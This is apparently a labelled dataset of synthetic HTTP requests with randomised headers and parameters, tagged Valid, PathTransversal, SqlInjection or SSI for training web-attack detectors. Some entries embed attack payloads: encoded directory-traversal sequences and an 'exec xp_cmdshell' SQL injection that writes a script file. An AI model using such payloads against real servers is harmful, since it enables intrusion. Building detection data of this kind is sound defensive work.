Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.4, identity;q=0.0, deflate, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 172.243.224.10
Cookie: euler=anWkX;qclea7idbfnA=0809
Cookie2: $Version="148"
Date: Tue, 07 Dec 04 06:10:24 CET
ETag: "h8t2lCbAJ.hMWV1Or"
Expect: tHds
From: wsWpne@sapo.cz
If-Modified-Since: Sun, 10 Jun 07 13:00:34 CET
If-Unmodified-Since: Wed, 20 Jan 10 09:44:46 GMT
If-Match: "EGmiz8obHUwqeOby0nBi"
If-None-Match: ".CbqhWcHFCClkJ1_e"
If-Range: Sat, 09 Sep 06 12:06:13 CET
Max-Forwards: 1
MIME-Version: 2.7
Pragma: tse=e8i9oshe
Proxy-Authorization: Basic bDFwbGJlOmljNzk4cQ==
Authorization: qiee is3OjGer=ao7snt
Range: -843411,20269-
Referer: /8peps5/mgheedn/iesy.sh
TE: trailers
Trailer: Warning
User-Agent: Mozilla/0.0 (Windows; U; Windows NT 9.9; cs-sa; rv:6.6.9) Gecko/15725750
UA-CPU: 68000
UA-Disp: 591,998,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0287x026
Via: FTP/9.4 www.erT0e.shtml, HTTP/8.6 www.almY.css, HTTP/5.4 51.128.138.174
Transfer-Encoding: compress
Upgrade: lobfh/7.3, qsoit/8.8, ftt/2.1, 6ufl/5.0, fl9/6.5
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 61.112.5.136
X-Serial-Number: 9761686986673
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 40496
Start - Id: 5163
class: Valid
PUT /hHitbRM@w/kSa4wetmsu6dpop0ene/rHFccY6Jao.bin? HTTP/1.0
Content-Length: 245
Content-Language: tseoctR
Content-Encoding: gzip
Content-Location: http://www.yuoe.org/nlos/orag/bsna.swf
Content-MD5: b2d0YmI3bHViVGxlMUVxYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Jul 09 06:22:27 GMT
Last-Modified: Wed, 18 Jun 08 17:45:07 CET
Host: 132.155.16.15:80
Connection: lwond
Accept: */*;q=0.8
Accept-Charset: ks_c_5601-1987;q=0.4, iso-10646-ucs-2;q=0.8, x-mac-hebrew;q=0.3, utf-8
Accept-Encoding: identity, compress;q=0.5, compress, deflate
Accept-Language: *
Cache-Control: max-stale=61
Client-ip: 73.76.159.247
Cookie: e4id3Yuf=bStnrtaCo;tL_.rQTEIxservicesv=ih rncS\;PxnEp=tixo5Tnullvseg=;gnUpybsatol=93533;ie3ctih=w4V97dpB;waeos=1
Cookie2: $Version="249"
Date: Mon, 04 Feb 08 11:35:28 CET
ETag: W/"yyvxIosvhKi7Qigv"
Expect: ERopy
From: sttS3e@cNouiuhrt.it
If-Modified-Since: Sat, 07 Jul 07 13:35:25 CET
If-Unmodified-Since: Mon, 27 Apr 09 10:55:26 UTC
If-Match: "MZfnnsYzezxrffWjiZC9"
If-None-Match: "wnq2s4bsFZKuvO1"
If-Range: "UwrMxvBsTViQePPDm@"
Max-Forwards: 6657
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.cmgaej.gov/eCna/cIiprpee/gnrena/not5ts.swf
Authorization: vhRa uhTS=vEthr
Range: 487-
Referer: http://www.onnuig.org/E9titaha/aptn/dtyszla/2iaw/edSea.cgi
TE: trailers,deflate;q=0.9,trailers
Trailer: Authorization
User-Agent: Mozilla/1.1 (X11; U; Open BSD i386 8.2; lr-tf; rv:1.7.7) Gecko/98754923
UA-CPU: x86
UA-Disp: 279,387,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1638x365
Via: FTP/0.1 www.lEftaet2.shtml, FTP/0.1 116.253.154.114
Transfer-Encoding: identity
Upgrade: snfH3E/4.0
Warning: 205 www.od5f.html "wlyis6aewo" "Wed, 10 Oct 07 03:40:22 CET"
X-Forwarded-For: 175.0.173.196
X-Serial-Number: 083639126
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eiarNa=iDeepEf ebodyy&n5sbiyyiessrna=tscripth  ist&shutdownCVD6xl=r&cee3ir=28479&rsrlgxO=eia4&possii=266952&HTHbodyYPCexec@=mct<yir@&2birnl0t4ryaton=timl&3htagtch9dnofdi=zGhDYO85x&i1r5lnoddrf=osoep&I7ia=oes8ulE3tsrtcpeeii&84dih=ecul@nun ev

End - Id: 5163
Start - Id: 23753
class: Valid
GET /hstckWyensuuesrz/iZj@WAb/rQ/6tnuer/PdeleteM3/0mwindow.openhy7/homeveval9SJx/reaovua0tdouvohx/0G41yVC6ZCWpkRBzl_/noedgslaD.exe?liOzd56=x++gt&8h@Ieopt_=757937190&inaltitaCeud=54794&zr3K0um=omI35egtnpe&OUiu1ehrs=o1xjd&ly3qrbu=8c7soslNMstP&uHf=2iZ&ro3basaqeAeess=mad&tnosg0=i&Cbte9Wprs1t1u=awh9abHamneTEtf&c8mHLmXxh=EK%3B0&meamojaT6atbzmn=3fisholred HTTP/1.1
Host: 136.157.125.188
Connection: hh7h
Accept: application/*, image/png;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a-4eu;q=0.7, xhd2gP9h-rxtddmt2
Cache-Control: min-fresh=291
Client-ip: 162.99.120.131
Cookie: 0h=527578;ahnlfaNieN=a_mshlW5;Agtnh=spn2dzJTgel;ou4yme6aale=ntb7t3unn
Cookie2: $Version="93"
Date: Thu, 08 May 08 22:13:57 UTC
ETag: "uhuVGtTX8ksUIS7R3"
Expect: tteedng=e8dtDpe
From: tddnc@aNensle3pe.org
If-Modified-Since: Sun, 15 Jun 08 12:37:12 UTC
If-Unmodified-Since: Sun, 28 Oct 07 11:09:09 CET
If-Match: "LbsCcmglVi3a5WvN4"
If-None-Match: "s3@N1uuo6knZl.cKh8X"
If-Range: *
Max-Forwards: 59
MIME-Version: 5.6
Pragma: 34='ramIee'
Proxy-Authorization: Digest nonce
Authorization: Outohh dtZusi=Sqtqvm
Range: 43983-6538,-2
Referer: /rlFanti.png
TE: gzip;q=0.7,trailers
Trailer: Pragma
User-Agent: Mozilla/7.4 (compatible; tnmama7se; Open BSD i386; daye; kVH3)
UA-CPU: x86
UA-Disp: 6313,5810,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 869x955
Via: 1hreF/8.0 www.Cfo1stn.html, 7.1 www.wmss.htm, FTP/0.1 www.mr8sc.png
Transfer-Encoding: deflate
Upgrade: gal/4.2, ein/9.9, lhi/2.6, Iarfn/4.7
Warning: 754 111.149.39.187 "E4v7ars1jmvnre" "Mon, 09 Aug 04 19:29:50 CET"
X-Forwarded-For: 180.65.250.66
X-Serial-Number: 13224
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 23753
Start - Id: 12753
class: Valid
GET /eoeeE7eogaocwaned/uzm/1wEjEmOb1Tlq/npwEvgPgXE_em2Ue/gde/PfvB2etcgxV/ah/1hvlrdzerfplux/tlbaue2elIrni/2ttdd4ymSpaeJmetnG/6US/mhvdieeeikes5stshoi.dll?nl=y&lotCzNcniwh=ho%7CpahDPwrtrtmp5&cFkInetcat=zhesuetioesopssb&0hG5utf6=ibup&@2Ub=ltauuEOees&w8objectGT=84657416&QMYpositionJRnph-2hA=servicesr&tsejceriq0osl=eamsTnie&einshrseaoaEtok=sL_VuaBXBYlD&2OdU.LW=10165&fhmoqEe=ho+%7Corl%5Cwrlm%7E5gttu&reZl=iN3YkB&9norSSb4t2waOc=rrtleiioathtwrnq&zwU9exec6gBVpUK=m&tdZ=dtEapprocessing-instruction%29RU+n%27h HTTP/1.1
Host: 63.98.245.150
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp;q=0.3, iso-8859-8, cp-936;q=0.9, x-mac-ce, x-mac-chinesetrad;q=0.1
Accept-Encoding: compress, gzip, deflate, gzip;q=0.2, gzip;q=0.9
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 4.223.155.209
Cookie: 8rhhsw6dxbta=i6N;si33adjyooxf=uqi;5aas1ke=ot omSa0;eeybebS=tD~lsvbscriptmag7log;iuouS=]h;8Ss=<ffqo&ravs) 
Cookie2: $Version="3"
Date: Mon, 04 Feb 08 22:36:37 CET
ETag: W/"7UpOQ9pxCWpDd78BH5XA"
Expect: 100-continue
From: 913o@cbhrnwaT.com
If-Modified-Since: Sun, 25 Oct 09 18:45:04 CET
If-Unmodified-Since: Tue, 08 Apr 08 04:59:19 CET
If-Match: *
If-None-Match: "t13gmVtvWO@GOAn"
If-Range: Tue, 21 Jun 05 09:22:06 GMT
Max-Forwards: 6
MIME-Version: 1.4
Pragma: w=a
Proxy-Authorization: eqxrte snsH=briit
Authorization: Digest opaque="iftc9s"
Range: 23407-76
Referer: /ijN8aape/sYtogiv.pl
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: mhigvhed (awIVN44; evp5wVe; 9@_.yIdN)
UA-CPU: MIPS
UA-Disp: 8183,952,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 596x179
Via: HTTP/3.1 182.89.231.0, 9.2 11.186.89.24, 4.6 www.rsOomg.jpg
Transfer-Encoding: gzip
Upgrade: al9/4.2, fue/6.6
Warning: 595 www.sEdyesc.html:10 "ssEsgqu" "Mon, 08 Sep 08 09:37:27 CET"
X-Forwarded-For: 227.241.172.23
X-Serial-Number: 66246
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12753
Start - Id: 27874
class: Valid
GET /aIdHUn/sXp6/cievEaTorbccnrelhr/xbkoeaopcst/e40lw8PE3Ehv/7Ra/0teEwes/slE/jinsertBod/npQ@FpnqiaGwE.jpeg?tpstovjtghstet=4&gNwhiXv4dH=1e%3BC%3F%25nO2+say&VsLWXb7rjo=g%2Fn%28ij HTTP/1.0
Host: www.hdqutttlCo.st
Connection: taserbo
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: s5i8='23ssc'
Client-ip: 202.94.102.161
Cookie: scOnleynty3=hiaRgsulogincludenetcate&drlsreplace;7lhBn=pae7xs87rsncssDet
Cookie2: $Version="71"
Date: Sat, 12 Nov 05 01:22:20 CET
ETag: "-wTBeABbPZhHHQahfDpK"
Expect: ejdey=oobsrshy;ee21tw7e=gdoE
From: iIjd@CLYb5so1.org
If-Modified-Since: Tue, 14 Jun 05 22:01:52 UTC
If-Unmodified-Since: Fri, 14 Nov 08 16:56:48 GMT
If-Match: *
If-None-Match: "iiI74t_Ngg44-@iPZ6"
If-Range: Mon, 26 Sep 05 02:15:15 GMT
Max-Forwards: 4
MIME-Version: 5.7
Pragma: oieeYeqa=uOO5r
Proxy-Authorization: nd1t nsieUE6e=uDueyte
Authorization: NTLM NnJ1bXRycm1mczBuZThubmVudEh0bnJuZnJzb3RhMGlvcmxkaG9o
Range: 334528-3,129-5609,255074-1318
Referer: /epyei/oOor8/pternxst/scnaSe/ttes.jsp
TE: trailers,chunked,deflate;q=0.4
Trailer: If-None-Match
User-Agent: Mozilla/1.2 (Machintosh; U; PPC 5.9; on-ys; rv:2.5.2) Gecko/17172887
UA-CPU: x86
UA-Disp: 0211,623,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8765x0161
Via: 4.4 www.oagT.gif
Transfer-Encoding: tshalg
Upgrade: inaoy2/3.1, sIxw/5.6, teehaD/4.3, ozitdh/8.9, E1veo/9.5
Warning: 856 45.17.38.234 "rUweihDugnEinc" 
X-Forwarded-For: 122.11.217.222
X-Serial-Number: 8614528725280
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 27874
Start - Id: 44772
class: PathTransversal
GET /BU/it/aeqeVm/BandTZ/nV.swf?2_xD3Qxhmailu=me8hoepis&Zr-jXFc=%7Ewherec%40sreymytopen&ete=26019&FboTtbmtwiad=tB6PCs&me=1786&a6soqhUjezgaau=0170012&eoItea=27599&S6=u5rt.h8&lcwtE9esd=7&mtdyasseng=481382&ABruseamssaEr3y=7458&eR3avwz=n&Ope=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&HIYATEc1ZnwU=hlLhct&F9ybiabsO=m9_ddfI8Hvl HTTP/1.1
Host: 245.72.182.244
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: L-Hehi6au, r-nolieeao;q=0.9, nsErfq2R-rc26s;q=0.8, cfxhB-erbDm
Cache-Control: max-age=38
Client-ip: 98.197.118.87
Cookie: GEG5xtHYjK=~a(ml'atudi o;NExOexecIo=42441
Cookie2: $Version="123"
Date: Wed, 05 May 04 17:10:34 CET
ETag: W/"jG0mx5PG2xZN@2MUK"
Expect: 100-continue
From: sfn2@eoeOs.net
If-Modified-Since: Sat, 26 Nov 05 22:26:53 UTC
If-Unmodified-Since: Sun, 21 May 06 03:47:30 CET
If-Match: "lxoxiI4LKK5f8aahFsvS"
If-None-Match: *
If-Range: Wed, 23 Jul 08 11:47:37 CET
Max-Forwards: 122
MIME-Version: 1.4
Pragma: tiqhp9s='rt3Tise'
Proxy-Authorization: Digest realm
Authorization: fkFode iligm=zegse
Range: 6578-336232,-258470,45228-5909
Referer: /npbEasea/tTro4.tiff
TE: trailers,deflate
Trailer: Warning
User-Agent: Mozilla/3.0 (Windows; U; Win98 7.3; rs-ma; rv:7.7.7) Gecko/12449260
UA-CPU: Sparc
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 822x152
Via: tles/3.0 www.m5eaao.tiff:5
Transfer-Encoding: compress
Upgrade: xdn/6.9, zath/4.3, enftae/3.8, tsot/2.4
Warning: 651 www.ohli.jpeg "ze4iSksESreE" 
X-Forwarded-For: 39.131.202.145
X-Serial-Number: 2157159271334
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44772
Start - Id: 4677
class: Valid
PUT /coir7qtRRi/jnjnr.t0zSY/2Kg1b_WwhemMmIIyvE/ul_fGzT.Cx.Q/09.shtml? HTTP/1.1
Content-Length: 180
Content-Language: aohtoI
Content-Encoding: compress
Content-Location: http://www.ineges.cz/hiod/3lyt4rt/rrnedi.mpg
Content-MD5: ejRuZjlsaHBlaG1maEhrZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 24 Feb 04 13:50:05 CET
Last-Modified: Sun, 04 Apr 10 05:32:44 GMT
Host: www.eC1uae.cz:33544
Connection: enicci
Accept: */*
Accept-Charset: windows-1252, x-mac-hebrew, x-mac-chinesesimp, x-mac-greek
Accept-Encoding: identity
Accept-Language: drek-Erg5rd
Cache-Control: no-cache
Client-ip: 12.88.180.100
Cookie: fiesraf=2]t;rDlcdayuhnqUya=c74tqAlTTrB;0ety5=+w1;4pe5=18623538
Cookie2: $Version="2"
Date: Fri, 28 Nov 08 20:24:42 UTC
ETag: "QcCCVXE.RUAyTkJHJq8A"
Expect: 100-continue
From: 5FsjeuC@Tne6Halils.it
If-Modified-Since: Wed, 18 May 05 20:56:29 GMT
If-Unmodified-Since: Fri, 24 Jul 09 02:30:37 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 403
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: hldtn eieme=dloheAoy
Authorization: Digest nc=A5DBd9E1
Range: 511-,489649-576168,-523
Referer: /si0liof/erT2keig/BKeltfy.asp
TE: trailers,trailers,chunked
Trailer: Pragma
User-Agent: hL4D4H5u- http://www.weirndh.biz
UA-CPU: 68000
UA-Disp: 860,425,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 561x7800
Via: FTP/6.9 250.105.206.85, 7.2 www.Etfsi.png, ICe/5.3 www.naiac.css
Transfer-Encoding: identity
Upgrade: cdZ/6.2, tOo2/2.7, neA/5.6, es0/1.8
Warning: 948 www.S7a9pa.tiff "rmeueveseaeeU2rdo" "Tue, 11 Sep 07 15:58:04 UTC"
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 2125001
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

s5s3aLn=oralincludehttpiot&ds7t=0gy&eLED=9631&wsrrEt6RbeiupA7=11&nlNhqtz=ginl&kartOamn=lrn aa68httpscript ethtaccesat&s3tnq=se-ts y&ee=tzte6vFEe&ebsvo8rktn04e=0337&reociqart=wbNera

End - Id: 4677
Start - Id: 35061
class: SqlInjection
GET /hO_P74FmHWcpPtpw/eFrl/4KtKOB4QjpxdiCEgg9/s36gYv.3IBg/ysahte4nie/idqoe.php?feept0aeEoAdr=%25ii&hiTeaww=sroaItittrErt8T4g&E0e5h=ifaytuilenyuekda7&siawesAtlee=w%7CH&slxnse=0036&rns4xeem=exec+++xp_cmdshell+%27%22seEcpmbge%22++%3E%3E+++script.vbs%27&iesesr=lnandbima&uOzedym7=6Ndnopen%2BwconnectroorOt&iryt=lhakX&htaccesSKd=stdinmawepasswdaelGdecho+dincludeekf&nhn7haoDun=opt%7E5ead&ha9tihhranitho8=eeskymq9eCeNeecc0l HTTP/1.1
Host: www.hsaallae.st
Connection: close
Accept: audio/*;q=0.3, text/*;q=0.4
Accept-Charset: windows-1251, iso-8859-8, ks_c_5601-1987, iso-8859-6;q=0.5, windows-1258
Accept-Encoding: 
Accept-Language: eghEpg-9, ars-qpphphd6, ejSedikl-iwldsw, eloiftb-ocmotesx, jfnaw-tdse3f
Cache-Control: no-cache
Client-ip: 243.80.185.17
Cookie: eo=tvJPonlkwc
Cookie2: $Version="94"
Date: Mon, 24 Mar 08 14:09:38 CET
ETag: W/"Uq98X1U-_aKZ@eC"
Expect: 4en1t=spype;iksuo0L=mtJuin
From: tigt@7oor.cz
If-Modified-Since: Sun, 15 Jun 08 06:31:07 GMT
If-Unmodified-Since: Thu, 01 Apr 04 17:27:30 CET
If-Match: *
If-None-Match: "Dq4a30R8SBQMWsUr"
If-Range: Thu, 29 Jun 06 13:22:41 GMT
Max-Forwards: 6
MIME-Version: 0.3
Pragma: utds1ron='Bp'
Proxy-Authorization: Basic aFJpQzpidHN1bw==
Authorization: NTLM ZG15b2VlY3BpUGVtaDBlc2hzZTl0bHNVZXJjcnUwYWRybW5y
Range: 478-841920,54-454132
Referer: http://www.993s.uk/buadd8.mdb
TE: trailers,deflate
Trailer: Accept-Encoding
User-Agent: niaMTyP http://www.el2y0.uk
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 989x6143
Via: HTTP/5.0 33.162.91.191:6, 4.8 www.tecj.jpg
Transfer-Encoding: gzip
Upgrade: l5i/1.7, lDqw/9.3, ade/1.3, rst/9.9
Warning: 825 www.eezs.png:4813 "dnlyiz8ddawi9eucren" 
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35061
Start - Id: 23799
class: Valid
GET /aNreplacelor0C6CX/Fexeciframe02Ln/ted/wnhsrmkzsLTbwjf/5N925mZnZN-GHe7.msf?houfIihhtoc8=6&Tsi=enoderswr&iSEdt=55 HTTP/1.0
Host: www.blduaadput.org:4029
Connection: close
Accept: video/mpeg, audio/basic;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: sgrnmIl-dEa;q=0.4, uoanec6p-anu51eo2, acj0ee-le
Cache-Control: sn8y9=tu4cA
Client-ip: 18.204.47.206
Cookie: wmueoBosn=71726084;w9cnr=pXQIqF2F9m;tl0noi=tai0yYfeesentNrT;joThnresh=lxII
Cookie2: $Version="4"
Date: Sun, 28 Mar 04 17:04:32 GMT
ETag: W/".KozA1JWUQDErC3-cLUn"
Expect: 100-continue
From: xe7vcre@gune.org
If-Modified-Since: Thu, 21 Aug 08 03:42:42 UTC
If-Unmodified-Since: Sun, 16 May 04 24:43:09 GMT
If-Match: *
If-None-Match: "OM59uqcagSKxjgwli"
If-Range: Mon, 08 May 06 24:57:21 CET
Max-Forwards: 5
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: NTLM ckRTdG5mZXJvVXNvc2VvZ0cydGV4TG95MXJ4cmYyb2Zib25jaWNrZWV5YXJpMA==
Authorization: NTLM dFN1cmE2dGVjdGVvb3BlOHJsbklvZWh0bm44b3BkaXk=
Range: 323-
Referer: /eilroqT.nsf
TE: chunked;q=0.9
Trailer: From
User-Agent: Mozilla/5.3 (X11; U; Linux i586 7.6; se-rp; rv:1.8.0) Gecko/43025963
UA-CPU: MIPS
UA-Disp: 7512,9255,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 884x6494
Via: HTTP/9.7 www.j0ci.jpeg
Transfer-Encoding: compress
Upgrade: e1rns/1.5, 4Ailn/4.5
Warning: 765 www.oiit7.html:14 "goersPi" 
X-Forwarded-For: 151.135.237.72
X-Serial-Number: 28931730
----: -----------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 23799
Start - Id: 45212
class: PathTransversal
GET ////? HTTP/1.0
Host: www.enihnsna.uk
Connection: rals
Accept: text/*, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-stale
Client-ip: 115.213.88.73
Cookie: m4ZJ=08156;sutgAsgrb10a=isdUegs;sskiaih=46;seh1=ba%Saeitp9OeZR;9uiyleeroFa=octehea0dactaow;svltwna=17747
Cookie2: $Version="5"
Date: Mon, 09 Jun 08 01:30:17 GMT
ETag: W/"_42@pBjVbX4bYLjRIkl"
Expect: EEer
From: 1p4rry@estl2a.org
If-Modified-Since: Tue, 21 Feb 06 05:39:31 UTC
If-Unmodified-Since: Fri, 15 Aug 08 13:27:35 CET
If-Match: "l.vX.hJEasDfI8kBDA"
If-None-Match: "ql1LzEgDmoYabfZ.U"
If-Range: Fri, 07 Sep 07 22:02:20 CET
Max-Forwards: 5188
MIME-Version: 3.6
Pragma: dicabtb='acqng8'
Proxy-Authorization: Naeer5 notae=eonhimtj
Authorization: NTLM b2VkTGlueWVDV29hckVFYW5oMmV1OTFhdGRjYVJwZVNhYmVqNGF1ZQ==
Range: 223066-,90-340647
Referer: /5ipieum/lojq/Peqm/i6ie.bin
TE: trailers
Trailer: User-Agent
User-Agent: y4hp/8.7
UA-CPU: 68000
UA-Disp: 675,5988,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 487x2717
Via: HTTP/1.4 www.3anlhcs.html
Transfer-Encoding: deflate
Upgrade: botOA/6.4, hiei4a/3.6, u8Qat/8.0
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 254.23.68.104
X-Serial-Number: 706890452941318
----: -------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45212
Start - Id: 29703
class: Valid
GET /cpXk6-/cDwrZeslq7IvNc.bf/n1/inyeshb0uononediux.jpg?ta1rAtcooli8lif=rn&tiea0siasfas2=2143776&otdqrli5isueorw=%7EFsq++adho9&ootuBOfeSgob=4697015&fgte=BDeenRassHmbtpsauo&Seacioiwwo=gK7&tcf=nMv HTTP/1.1
Host: www.xvnntEotlr.net
Connection: close
Accept: */*
Accept-Charset: euc-jp, x-mac-cyrillic
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: ae=eN8
Client-ip: 243.181.147.105
Cookie: css=iUOsH-5
Cookie2: $Version="38"
Date: Sat, 25 Apr 09 06:53:42 CET
ETag: "GhVCu8H@TbsGDg7rOx"
Expect: wp5f3ow=sOrEahg;Chaiyi=etit
From: nonai@Twda.it
If-Modified-Since: Sat, 06 Nov 04 02:15:32 CET
If-Unmodified-Since: Fri, 23 Jan 09 18:33:35 GMT
If-Match: "dNrsOt1U7d@JCBrHTY"
If-None-Match: *
If-Range: Fri, 26 Jun 09 17:38:23 GMT
Max-Forwards: 842
MIME-Version: 3.1
Pragma: esnsan=j5efrsdt
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: dlaos 8licnng=aghmrC5
Range: -252619
Referer: /dtTlt/1xeecMH.cfm
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/1.0 (X11; U; SunOS sun4u 9.7; sc-kd; rv:5.1.8) Gecko/76083330
UA-CPU: MIPS
UA-Disp: 162,5361,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7452x2793
Via: HTTP/1.3 www.dmt9uams.shtml, cSo2/3.5 www.iiiIeamy.gif:0
Transfer-Encoding: deflate
Upgrade: vdqdss/4.7, wsibnl/9.2
Warning: 786 www.dezo.shtml "nnoptssQ3so3s" 
X-Forwarded-For: 25.252.143.178
X-Serial-Number: 2911766071168
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29703
Start - Id: 13880
class: Valid
GET /ptclilnej.gif?enklbndadlneel3=sJJ3dS&Exterm97Q=rt&6neneevcAobrn=92&3wIxaaL7g=vETP7&mh7e0=scripth&mFfda=1&iEee=bgcetOftzsphps%3AucTi4rh&mdZahri=099&gdieaIa=nrsbgsoundin&eEtimuMrEIrn=ojHthLhJS&rHonafa=e5peifnoedrnpl HTTP/1.0
Host: 12.111.21.35
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: ydreiO=ysdinnet
Client-ip: 5.228.57.192
Cookie: @RPzO0Zqvbscriptv=o5ojeoqomktfee3h0;husseemhpbe=itUtKesohf~;hiso=(t@;f5zs=aIjt droonM >o?
Cookie2: $Version="2"
Date: Wed, 23 Sep 09 05:02:59 CET
ETag: W/"UzkU53@-de6bwowOH7ON"
Expect: i9xomotu
From: aopeat@lwiRaar.be
If-Modified-Since: Thu, 24 Apr 08 22:39:37 GMT
If-Unmodified-Since: Sat, 20 Nov 04 15:33:30 GMT
If-Match: "kktCi_tymTvFWR6S"
If-None-Match: "mEOm-OmD8-Fy17pc4_6B"
If-Range: Mon, 21 May 07 24:39:55 UTC
Max-Forwards: 84
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: 69sr aeSoonsr=ixten
Authorization: Basic dHVkb0U6YU13ZA==
Range: -52,788-774
Referer: /a7enso5/StWaad/0dw7e.jsp
TE: gzip,trailers
Trailer: Expect
User-Agent: Mozilla/1.5 (Machintosh; U; Mac OS X 5.2; tg-a9; rv:8.0.5) Gecko/77397776
UA-CPU: Sparc
UA-Disp: 4060,2972,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7739x7906
Via: 3.5 www.Noxti6e4.html:3, 7.1 www.ytcaete.html:896
Transfer-Encoding: compress
Upgrade: d3bfi/2.4, EhWrnN/9.4
Warning: 098 16.209.158.37 "jtcOeZythsytt9zaQlpa" "Sat, 23 Jul 05 18:39:08 GMT"
X-Forwarded-For: 150.165.127.46
X-Serial-Number: 02052575004924
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13880
Start - Id: 18493
class: Valid
GET /sto1s5geh2osicco.cfm?oC=2JCrfj6GLay&C3r5zHJunw=w%40oit&n5hEtiwseM=n3eIze&yzue21sroe=894&eu=eea4btf1oau8pd&ten2Noaitt=3id%40imetaevaleunph-rmdocuments%40+&G@ChnhL=%25+%5Dso&hpd3uier=estwfvy&laReh7f9r=replace3th%25imgh12+%7Ehaa&haplRtaBsUst=he6ie&EcmdKANRNvupdateTupdatea=xoeesffai HTTP/1.1
Host: 239.73.46.255
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip, identity
Accept-Language: nRr-dntes, rnhi-qL, haRcE-dcei;q=0.9, 7-o
Cache-Control: yasot5t='gnAihu'
Client-ip: 117.52.42.62
Cookie: ltti1b3er=minn3;awsOsu=2;evalJHform=44385478;3xmolpvot=2678322254;5noiluo=422174
Cookie2: $Version="7"
Date: Thu, 21 Jul 05 11:58:55 GMT
ETag: W/"-4omQvbN_jok3ub1vq"
Expect: 100-continue
From: eocete@3mtoie.org
If-Modified-Since: Mon, 30 Jan 06 15:19:33 CET
If-Unmodified-Since: Wed, 27 May 09 17:59:23 GMT
If-Match: "6h2fzQolgIA-aa8"
If-None-Match: "lD92KjCCYFpTEdwY22"
If-Range: Fri, 29 Jan 10 06:13:08 GMT
Max-Forwards: 478
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic aWVoVGh1ZXQ6YW9oaA==
Authorization: Basic YW5sbnVCbzpzZWVyN290
Range: 85-,-50971,7583-04
Referer: /xEco/itU0/ymfiar/aC8d/6befz.exe
TE: deflate;q=0.1,trailers,trailers
Trailer: If-Range
User-Agent: rrzlWlneU (ttuAmHS9C4; jokQBRK2c@; rwdcb.v3J)
UA-CPU: MIPS
UA-Disp: 1147,7434,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 934x751
Via: HTTP/3.9 www.eegr.htm, 2.4 247.175.178.99
Transfer-Encoding: oewL
Upgrade: ryat/0.4, gavm/5.1, n8hana/0.1
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 100961283776
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18493
Start - Id: 40416
class: SSI
POST /it1usiYisstnyi/e1RS3h@coGq5Uw/bhtatT.jpeg? HTTP/1.0
Content-Length: 128
Content-Language: 72,hLlemm
Content-Encoding: identity
Content-Location: /hueimeD/c7mesm/faaie/rlhila/l0r5eTse.jsp
Content-MD5: YWZvb29jNWF2bmhldWJyaQ==
